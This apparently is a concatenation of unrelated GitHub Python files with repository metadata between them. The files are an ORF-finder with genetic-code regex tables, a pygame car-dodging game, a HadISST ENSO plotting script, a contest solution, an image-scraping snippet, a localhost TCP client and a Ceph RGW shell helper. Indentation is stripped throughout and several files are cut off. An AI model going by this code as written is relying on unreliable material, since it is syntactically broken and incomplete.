alter_flat_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C|A)',
'Ter':r'TAG',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
chl_phy_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)|TAG',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TAA|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
trema_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(A|G)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
scen_obliq={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)|TAG',
'Ser':r'TC(G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'T(C|A|G)A',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
thraus_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TTG|CT(A|T|C|G)',
'Ser':r'TC(G|T|C|A)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'T(A|T|G)A|TAG',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
ptero_branc_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(G|T|C|A)|AG(T|C|A)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)|AGG',
'_X_':r'N'}
candi_divis_gracil={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)|TGA',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
pachy_tanno={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)|CTG',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
karyorelict={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(G|A)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'(T|C)A(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
condylostoma={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'(T|C)A(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
mesodinium={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(A|G|T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
peritrich={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'(G|T)A(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
blastocrithidia={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'(T|G)A(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
cephalo_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(A|T|C)',
'Tyr':r'TA(T|C|A)',
'Ter':r'TAG',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)|AGG',
'_X_':r'N'}
replacement={'Val':'V',
'Ala':'A',
'Asp':'D',
'Glu':'E',
'Gly':'G',
'Phe':'F',
'Leu':'L',
'Ser':'S',
'Tyr':'Y',
'Cys':'C',
'Trp':'W',
'Pro':'P',
'His':'H',
'Gln':'Q',
'Arg':'R',
'Ile':'I',
'Met':'M',
'Thr':'T',
'Asn':'N',
'Lys':'K',
'_X_':'X'}
# A list of all the dictionaries
genetics=[standard,vertebrate_mitochondria,yeast_mitochondria,mo_pro_co_mito_myco_spiro,invertebrate_mitochondria,cil_das_hexamita,echino_flat,euplotid_nuclear,bact_arch_plnt_plst,alt_yeast_nuc,ascid_mito,alter_flat_mito,chl_phy_mito,trema_mito,scen_obliq,thraus_mito,ptero_branc_mito,candi_divis_gracil,pachy_tanno,karyorelict,condylostoma,mesodinium,peritrich,blastocrithidia,cephalo_mito]
# We make the selected codon as an index in the dictionaries list, and we assign it to -aa_aacodons-
aa_aacodons=genetics[int(genetic_code_num)-1]
# We create the file 'completeframes.txt' to write the final result
completeframes=open('completeframes.txt','w')
# We create 6 fasta files called orf_frame_n.fasta to write the DNA, mRNA and protein sequences of all frames in all sequences
orf_fasta1=open('orf_frame_1.fasta','w')
orf_fasta2=open('orf_frame_2.fasta','w')
orf_fasta3=open('orf_frame_3.fasta','w')
orf_fasta_r1=open('orf_frame_-1.fasta','w')
orf_fasta_r2=open('orf_frame_-2.fasta','w')
orf_fasta_r3=open('orf_frame_-3.fasta','w')
# We now define a function which will translate all 6 frames completely
def translate(dna,codes,n):
rf=''
# We loop through the range of the complete sequence and jump every 3 nucleotides
for i in range(0,len(dna),3):
# We loop through the items of the dictionaries, --aa-- is the amino acid and --aacodons-- is the pattern of the codon
for aa,aacodons in codes.items():
# if any pattern corresponds to the (dna[i+n:i+3+n]), which are every three codons, it will add the translated aa to --rf--
if re.search(aacodons,dna[i+n:i+3+n]):
rf+=aa
# The function will return the translated frame completely
return rf
# We now make a function to search for the open reading frames in all the reading frames
def orf_f(rf,cutoff):
orffound=''
fastawriter=''
# We make an iterable object that has a specific pattern that searches for Methionine and the terminating sequences
# It can also search for Methionine and no terminating sequence if the ORF ends at the end of the strand
x=re.finditer(r'Met.*?Ter|Met.*',rf)
# We iterate on every ORF, i.group() here is found ORF
for i in x:
# We choose the ORF that is bigger than the cutoff score (-n-)
if len(i.group())>=cutoff:
final=''
# We remove the Ter word from the ORF (because the ORF doesn't contain a stop codon), and we assign it to --prefinal--
prefinal=re.sub(r'Ter','',i.group())
# We loop through a range of numbers in the --prefinal-- characters, and we jump every 3 characters
for j in range(0,len(prefinal),3):
# If we choose the one letter: we replace every three lettered aa by its one lettered aa, and we add it to --final-- and add a space after every aa
if letterchoice=='1':
for three, one in replacement.items():
if re.search(three,prefinal[j:j+3]):
final+=one
#If we choose three letters: we put every three letters (For example: Met) to --final-- and we add a space after every one.
elif letterchoice=='2':
final+=prefinal[j:j+3]
# --orffound-- now contains all the information related to the ORF and the protein translated, that will be written in the text file
# --fastawriter-- now contains the DNA, RNA and protein sequence for the reading frame
orffound+=dna_f[i.start():i.end()]+'\n'+"It's found in locations "+str(i.start()+1)+' to '+str(i.end())+'\n'+'Its length is '+str(len(dna_f[i.start():i.end()]))+'\n'+'Protein translated: '+final+'\n'+'Its length is: '+str(int(len(prefinal)/3))+'\n\n'
fastawriter+=nameofseq+' (open reading frame sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+dna_f[i.start():i.end()]+'\n\n'+nameofseq+' (mRNA sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+dna_f[i.start():i.end()].replace('T','U')+'\n\n'+nameofseq+' (protein sequence)'+'('+str(i.start()+1)+':'+str(i.end())+')'+'\n'+final+'\n\n'
# We return the value orffound
return [orffound,fastawriter]
# A function for the reverse strand that has the same function like the one before it, we change in the location numbers because it is the reverse strand
def orf_r(rf,cutoff):
orffound=''
fastawriter=''
x=re.finditer(r'Met.*?Ter|Met.*',rf)
for i in x:
if len(i.group())>=cutoff:
final=''
prefinal=re.sub(r'Ter','',i.group())
for j in range(0,len(prefinal),3):
if letterchoice=='1':
for three, one in replacement.items():
if re.search(three,prefinal[j:j+3]):
final+=one
elif letterchoice=='2':
final+=prefinal[j:j+3]
orffound+=dna_r[i.start():i.end()]+'\n'+"It's found in locations "+str(len(dna_f)-i.start())+' to '+str(len(dna_f)-i.end()+1)+'\n'+'Its length is '+str(len(dna_r[i.start():i.end()]))+'\n'+'Protein translated: '+final+'\n'+'Its length is: '+str(int(len(prefinal)/3))+'\n\n'
fastawriter+=nameofseq+' (open reading frame sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')'+'\n'+dna_r[i.start():i.end()]+'\n\n'+nameofseq+' (mRNA sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')''\n'+dna_r[i.start():i.end()].replace('T','U')+'\n\n'+nameofseq+' (protein sequence)'+'('+str(len(dna_f)-i.start())+':'+str(len(dna_f)-i.end()+1)+')'+'\n'+final+'\n\n'
return [orffound,fastawriter]
for i in range(0,len(seqs_final)):
# Write in the text file each sequence name, a newline after it
nameofseq=names[i]
completeframes.write(nameofseq+'\n')
# -dna_f- will be one of every sequence in loop
dna_f=(seqs_final[i])
# -dna_r- will be every reverse complementary strand, in order to get the start and stop codons from 5' to 3' in the 3' to 5' strand
dna_r=dna_f[::-1].replace('A','t').replace('T','a').replace('C','g').replace('G','c').upper()
# We define a function that will translate every frame completely, still without finding the open reading frames
# --dna-- is either -dna_f- or -dna_r-, --codes-- is the genetic code, and --n-- is the frame number minus one
# We change the number from zero to two in order to change the frame, and we assign the value of the frames to every possible frames
# We add 'X' in frame 2 and 3 in both strands, to keep the position similar to the DNA strand
rf1=translate(dna_f,aa_aacodons,0)
rf2='X'+translate(dna_f,aa_aacodons,1)
rf3='XX'+translate(dna_f,aa_aacodons,2)
rfr1=translate(dna_r,aa_aacodons,0)
rfr2='X'+translate(dna_r,aa_aacodons,1)
rfr3='XX'+translate(dna_r,aa_aacodons,2)
# Now we write this sentence in the file before we put every ORF in its specific frame
completeframes.write("-Open reading frames found in frame 1 (5'-3'): "+'\n\n')
completeframes.write(orf_f(rf1,n)[0])
completeframes.write("-Open reading frames found in frame 2 (5'-3'): "+'\n\n')
completeframes.write(orf_f(rf2,n)[0])
completeframes.write("-Open reading frames found in frame 3 (5'-3'): "+'\n\n')
completeframes.write(orf_f(rf3,n)[0])
completeframes.write("-Open reading frames found in frame 1 (3'-5'): "+'\n\n')
completeframes.write(orf_r(rfr1,n)[0])
completeframes.write("-Open reading frames found in frame 2 (3'-5'): "+'\n\n')
completeframes.write(orf_r(rfr2,n)[0])
completeframes.write("-Open reading frames found in frame 3 (3'-5'): "+'\n\n')
completeframes.write(orf_r(rfr3,n)[0])
# Now we write in the 6 fasta files
orf_fasta1.write(orf_f(rf1,n)[1])
orf_fasta2.write(orf_f(rf2,n)[1])
orf_fasta3.write(orf_f(rf3,n)[1])
orf_fasta_r1.write(orf_r(rfr1,n)[1])
orf_fasta_r2.write(orf_r(rfr2,n)[1])
orf_fasta_r3.write(orf_r(rfr3,n)[1])
print('''\nThanks for using the ORF finder tool, Valar Morghulis.
Press enter to save the files''')
enter_to_finish=input('')
|
[
"noreply@github.com"
] |
Omaramin81297.noreply@github.com
|
cf77b87e3e07bb149533bb8be1fcbed9593f35ef
|
552976e9ff2d7836c5ec7965950fb80ad78ba831
|
/firstpygame.py
|
293fb9c727a65bfb2274d5b6de3ffccdcd6b5965
|
[] |
no_license
|
mickey2798/pygame
|
4312ab8975a2787814e1ca969190535d63ca038f
|
ffacb3a07e72e3a9c6ea9f1c6a159c5247c81718
|
refs/heads/master
| 2020-06-29T18:05:22.522241
| 2019-08-05T05:31:55
| 2019-08-05T05:31:55
| 200,587,202
| 0
| 1
| null | 2019-10-21T20:17:51
| 2019-08-05T05:20:17
|
Python
|
UTF-8
|
Python
| false
| false
| 6,861
|
py
|
import pygame
import time
import random
pygame.init() #Instantiate all the module in pygame.
crash_sound = pygame.mixer.Sound("Crash.wav")
pygame.mixer.music.load("Race_Car.wav")
display_width = 800 #width of the window
display_height = 500 #height of the window
black = (0,0,0)
white = (255,255,255)
red = (200,0,0)
green = (0,200,0)
bright_red =(255,0,0)
bright_green =(0,255,0)
block_color = (53,115,255)
car_width = 73
gameDisplay = pygame.display.set_mode((display_width,display_height)) #Height and Weight
pygame.display.set_caption("RACEY") #Caption on the Window
clock = pygame.time.Clock()
carImg = pygame.image.load('racecar.png') #LOAD THE IMAGE OF THE CAR
pygame.display.set_icon(carImg)
pause = False
def things_dodged(count): #This function basically put a score on the top left on the screen.
font = pygame.font.SysFont(None, 25)
text = font.render("Dodged: "+str(count) , True,black)
gameDisplay.blit(text,(0,0))
def things(thingx,thingy ,thingw,thingh,color): #it basically draws the obstacle.
pygame.draw.rect(gameDisplay,block_color,[thingx,thingy,thingw,thingh])
#To display the car location.
def car(x,y):
gameDisplay.blit(carImg, (x,y)) #to display the car in hgiven coordinates
def text_objects(text,font):
textSurface = font.render(text,True,black)
return textSurface , textSurface.get_rect()
def message_display(text):
largeText = pygame.font.Font('freesansbold.ttf',115)
TextSurf, TextRect = text_objects(text, largeText)
TextRect.center = ((display_width/2),(display_height/2))
gameDisplay.blit(TextSurf , TextRect)
pygame.display.update()
time.sleep(2)
game_loop()
def button(msg ,x,y,w,h,i,a,action=None):
mouse = pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
#print(click)
#print(mouse)
if x+w > mouse[0] > x and y+h > mouse[1] > y:
pygame.draw.rect(gameDisplay,a,(x,y,w,h))
if click[0] == 1 and action != None:
action()
## if action == "play":
## game_loop()
##
## elif action == "quit":
## pygame.quit()
## quit()
else:
pygame.draw.rect(gameDisplay,i,(x,y,w,h))
smallText = pygame.font.Font("freesansbold.ttf",20)
textSurf, textRect = text_objects(msg,smallText)
textRect.center = ((x+(w/2),y+(h/2)))
gameDisplay.blit(textSurf ,textRect)
def quitgame():
pygame.quit()
quit()
def unpause():
global pause
pygame.mixer.music.unpause()
pause = False
def paused():
pygame.mixer.music.pause()
largeText = pygame.font.SysFont("comicsansms",115)
TextSurf, TextRect = text_objects("Paused", largeText)
TextRect.center = ((display_width/2),(display_height/2))
gameDisplay.blit(TextSurf, TextRect)
while pause:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
#gameDisplay.fill(white)
button("Continue",150,400,100,50,green,bright_green,unpause)
button("Quit",550,400,100,50,red,bright_red,quitgame)
pygame.display.update()
clock.tick(15)
def crash():
pygame.mixer.music.stop()
pygame.mixer.Sound.play(crash_sound)
message_display('DISHOOM')
def game_intro():
intro = True
while intro:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
gameDisplay.fill(white)
largeText = pygame.font.Font('freesansbold.ttf',115)
TextSurf, TextRect = text_objects("RACE 4", largeText)
TextRect.center = ((display_width/2),(display_height/2))
gameDisplay.blit(TextSurf , TextRect)
button("GO!",150,400,100,50,green,bright_green,game_loop)
button("QUIT!!",550,400,100,50,red,bright_red,quitgame)
#print(mouse)
#pygame.draw.rect(gameDisplay,red,(550,400,100,50))
pygame.display.update()
clock.tick(15)
def game_loop():
global pause
pygame.mixer.music.play(-1)
x = (display_width * 0.45)
y = (display_height * 0.8)
x_chnge = 0
thing_startx = random.randrange(0,display_width) #to display the obstacle randomly
thing_starty = -600
thing_speed = 7 #speed of the obstaccle
thing_width = 100
thing_height = 100
dodged = 0
gameExit = False
while not gameExit:
for event in pygame.event.get() :
if event.type == pygame.QUIT:
gameExit = True
if event.type == pygame.KEYDOWN: #if any key is pressed or not.
if event.key == pygame.K_LEFT: #if Left key is pressed.
x_chnge =-5
elif event.key == pygame.K_RIGHT: #IF Right key is pressed.
x_chnge =5
if event.key == pygame.K_p:
pause = True
paused()
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
x_chnge = 0
x += x_chnge
gameDisplay.fill(white)
#things(thingx ,thingw,thingh,color)
things(thing_startx, thing_starty,thing_width,thing_height,black)
thing_starty += thing_speed
car(x,y)
things_dodged(dodged)
if x > display_width - car_width or x < 0:
crash()
if thing_starty > display_height:
thing_starty = 0 - thing_height
thing_startx = random.randrange(0,display_width)
dodged += 1
thing_speed += 1
thing_width += (dodged *1.2) #to make it more interesting we are making the obstacle little bigger.
if y < thing_starty + thing_height:
print('Y_crossOver')
if x > thing_startx and x < thing_startx + thing_width or x+car_width > thing_startx and x + car_width < thing_startx + car_width:
print('X_crossOver')
crash()
pygame.display.update() #update the whole screen
clock.tick(60) # fps
game_intro()
game_loop()
pygame.quit()
quit()
|
[
"noreply@github.com"
] |
mickey2798.noreply@github.com
|
1990d0596ab619757836e2881680fcfddc198492
|
f441d86d1de8e1d75057f5c8c92ae012c2e35b92
|
/GEOS_Util/coupled_diagnostics/verification/HadISST/enso_plots.py
|
289e5c5a87261cc0ff512d2e37a3b92c8396b323
|
[] |
no_license
|
ddlddl58/GMAO_Shared
|
95f992e12b926cf9ec98163d6c62bac78e754efa
|
e16ddde5c8fab83429d312f5cff43643d9f84c94
|
refs/heads/master
| 2021-05-20T20:46:26.035810
| 2020-04-01T20:32:10
| 2020-04-01T20:32:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,241
|
py
|
import os, pickle
import matplotlib.pyplot as pl
import matplotlib.dates as mdates
import scipy as sp
from mpl_toolkits.basemap.cm import sstanom
from my_lib import plotters
dsetname='HadISST'
varname='sst'
path=os.environ['NOBACKUP']+'/verification/'+dsetname
indfile=path+'/data/'+varname+'_pc1.dat'
indpic=path+'/pics/'+varname+'_pc1.png'
indtitle='HadISST PC1'; xlab='years'
indylim=(-3,3); tint=10
eoffile=path+'/data/'+varname+'_eof1.dat'
eofpic=path+'/pics/'+varname+'_eof1.png'
units='$^0$C'
copts={'levels': sp.arange(-1,1.1,0.1),\
'cmap': sstanom}
cbar_opts={'orientation': 'vertical'}
try:
os.makedirs(path+'/pics')
except OSError:
pass
# read data
f=open(indfile); pc=pickle.load(f); f.close()
f=open(eoffile); eof=pickle.load(f); f.close()
# Normalize pc
s=pc.ave(0,ret_std=True)[1].data
pc.data/=s
eof.data*=s
pc.name=indtitle
pl.figure(1,figsize=(12,4)); pl.clf()
pc.d(); ax=pl.gca()
ax.set_xlabel(xlab); ax.set_ylim(indylim)
ax.xaxis.set_major_locator(mdates.YearLocator(tint))
pl.grid(); pl.show()
pl.savefig(indpic)
# Plot EOF1
pp=plotters.GeoPlotter()
eof.units=units; pp.copts.update(copts); pp.cbar_opts.update(cbar_opts)
pl.figure(2); pl.clf()
pp(eof)
pl.grid(); pl.show()
pl.savefig(eofpic)
|
[
"yury.v.vikhliaev@nasa.gov"
] |
yury.v.vikhliaev@nasa.gov
|
a4250f787cf24fcae3b3e2b83b946e3b4e12fff5
|
d77104b7bf6c1f955710cd432d1c3f3088763180
|
/Term2/Session 18/1-regex.py
|
82d12492c20476f4e7a348f852282101fbd47dcb
|
[
"MIT"
] |
permissive
|
theseana/apondaone
|
51d3f6887f029535ec6cb71afcab1a876c3655ba
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
refs/heads/main
| 2023-03-17T22:32:45.546061
| 2021-03-08T15:34:40
| 2021-03-08T15:34:40
| 303,436,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
import re
import requests
from myFUnction import download_image
url = "https://bama.ir/car/ssang-yong/actyon"
site_data = requests.get(url)
images_link = re.findall('<img src=\"(.+\.png)"', site_data.text)
for link in images_link:
download_image(link)
|
[
"info@poulstar.com"
] |
info@poulstar.com
|
6459dde0ebd78814634cd97b178ebb5603a4fdca
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02911/s420554588.py
|
6c9a8426c8167fb4419c378a6a8f264c8e0fad7f
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 337
|
py
|
import math
import collections
import itertools
def resolve():
N,K,Q=map(int,input().split())
A=[0]*Q
Aans=[0]*N
for i in range(Q):
A[i]=int(input())
Aans[A[i]-1]+=1
for i in range(N):
if(0>=K-Q+(Aans[i])):
print("No")
else:
print("Yes")
resolve()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
bdd3c7e8e6514e559516ca85c27d3d7345152a4a
|
9c41041b4946b90164f27fee532dfca228f947dd
|
/script/local_get.py
|
9951527129e28c79a63daf5bcb549697ea614dff
|
[] |
no_license
|
qiwei94/tcp_wan_test
|
164aaf33ab0130a30c2c251fea99243e266a8616
|
fd7354fa77d45be78d0510bc88ddb64a8e3dbf86
|
refs/heads/master
| 2020-03-14T10:11:49.309348
| 2018-05-05T06:04:13
| 2018-05-05T06:04:13
| 131,561,000
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 340
|
py
|
#!/usr/bin/env python
# TCP-Client
import socket
import sys
import threading
import time
from multiprocessing import Process
sk_obj=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk_obj.connect(('127.0.0.1',8001))
while True:
data = sk_obj.recv(8096)
print 'Server send information : %s' % data.decode('utf-8')
sk_obj.close()
|
[
"qiweizhang8523@gmail.com"
] |
qiweizhang8523@gmail.com
|
c74ae9036ab04c6041e27b5582f39fdd95f30a36
|
43fa11ba35c2df0c7a144e282fa9cdf105153c1e
|
/rgw/v1/utils/utils.py
|
d6f4dd1fe0c9e87e7f09bb93a599faac36f672e0
|
[] |
no_license
|
sidhant-agrawal/ceph-qe-scripts
|
d11451c771617d8776a075fcac8dd3a25f8319d6
|
729541d1d9f996015d9374178836cfca366e906c
|
refs/heads/master
| 2020-05-30T20:12:28.090434
| 2019-03-06T05:44:13
| 2019-03-06T05:44:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,414
|
py
|
import os
import hashlib
import subprocess
import log
import json
from random import randint
import ConfigParser
import yaml
def exec_shell_cmd(command):
try:
print('executing command: %s' % command)
variable = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
v = variable.stdout.read()
return True, v
except (Exception, subprocess.CalledProcessError) as e:
print('command failed')
